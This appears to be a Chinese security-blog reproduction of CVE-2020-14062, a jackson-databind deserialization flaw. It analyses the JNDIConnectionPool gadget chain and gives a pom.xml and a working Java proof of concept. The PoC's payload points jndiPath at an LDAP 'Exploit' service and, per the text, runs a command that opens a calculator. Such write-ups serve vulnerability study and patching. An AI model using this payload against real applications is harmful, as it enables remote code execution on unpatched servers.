menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-14062)FasterXML jackson-databind 反序列化漏洞 chevron_right (CVE-2020-14062)FasterXML jackson-databind 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-14062)FasterXML jackson-databind 反序列化漏洞.md
    3.04 KB / 2021-07-15 19:52:46
        (CVE-2020-14062)FasterXML jackson-databind 反序列化漏洞
=========================================================

一、漏洞简介
------------

**利用条件**开启`enableDefaultTyping()`使用了`com.sun.xml.parsers:jaxp-ri`第三方依赖

二、漏洞影响
------------

jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7

三、复现过程
------------

### 漏洞分析

首先定位到`com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool`类,之后发现一处可疑的JNDI注入:1.png参数为jndiPath,该参数在当前类中有对应的set操作,在反序列化时会调用setJndiPath进行一次赋值操作,故可控:2.png然而我们的`findDatasource`并不会被调用,之后全局搜索`findDatasource`函数,发现存在两处,一处是`testConnect()`,这对我们来说无用,另外一处是`getConnection()`,该函数在序列化时会被调用:3.png在反序列化操作时,我们可以将`jndipath`指向恶意`LDAP`服务,之后再次进行序列化操作时`getConnection`会被调用(多少有些鸡肋,需要先反序列化,灾后再序列化一次),由此导致`findDatasource`被调用,最后导致JNDI注入,整个利用链如下所示:

    mapper.readValue
        ->setJndiPath
            ->getConnection
                 ->findDatasource
                     ->context.lookup(this.jndiPath);

### 漏洞复现

> pom.xml文件:

    <dependencies>
        <dependency>
          <groupId>com.fasterxml.jackson.core</groupId>
          <artifactId>jackson-databind</artifactId>
          <version>2.9.10.4</version>
        </dependency>

        <dependency>
          <groupId>com.sun.xml.parsers</groupId>
          <artifactId>jaxp-ri</artifactId>
          <version>1.4</version>
        </dependency>

        <dependency>
          <groupId>org.slf4j</groupId>
          <artifactId>slf4j-nop</artifactId>
          <version>1.7.2</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
        <dependency>
          <groupId>javax.transaction</groupId>
          <artifactId>jta</artifactId>
          <version>1.1</version>
        </dependency>
      </dependencies>

> POC:

    package com.jacksonTest;

    import com.fasterxml.jackson.databind.ObjectMapper;

    import java.io.IOException;

    public class Poc {
        public static void main(String[] args) throws Exception {
            ObjectMapper mapper = new ObjectMapper();
            mapper.enableDefaultTyping();
            String payload = "[\"com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
            try {
                Object obj = mapper.readValue(payload, Object.class);
                mapper.writeValueAsString(obj);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

之后运行该程序,成功执行命令,弹出计算器:

4.png

参考链接
--------

> https://xz.aliyun.com/t/8012\#toc-12
    links
    file_download